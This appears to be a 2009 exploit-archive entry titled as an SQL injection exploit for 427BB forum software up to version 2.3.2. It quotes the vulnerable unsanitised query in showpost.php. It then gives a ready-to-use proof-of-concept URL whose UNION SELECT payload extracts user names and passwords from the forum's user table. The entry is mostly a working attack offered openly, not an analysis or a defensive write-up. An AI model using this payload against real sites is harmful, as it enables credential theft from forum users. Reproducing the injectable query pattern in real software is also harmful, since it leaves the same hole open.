[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : 427BB Fourtwosevenbb <= 2.3.2 SQL Injection Exploit
# Published : 2009-12-04
# Author : cr4wl3r
# Previous Title : GeN3 forum V1.3 SQL Injection Vulnerability
# Next Title : Invision Power Board <= 3.0.4 LFI and <=3.0.4 and <=2.3.6 SQL Injection


[ Discovered by cr4wl3r  cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Download Script      :  http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################

########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
#       <?php
#line 118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
#line 119:
#line 120: $res = mysql_query($sql);
#       ?>
########################################################################

########################################################################
#PoC  :   http://server/[path]/showpost.php?ForumID=1&post=[SQL]
#         http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################

   [ Gorontalo / 2009 ]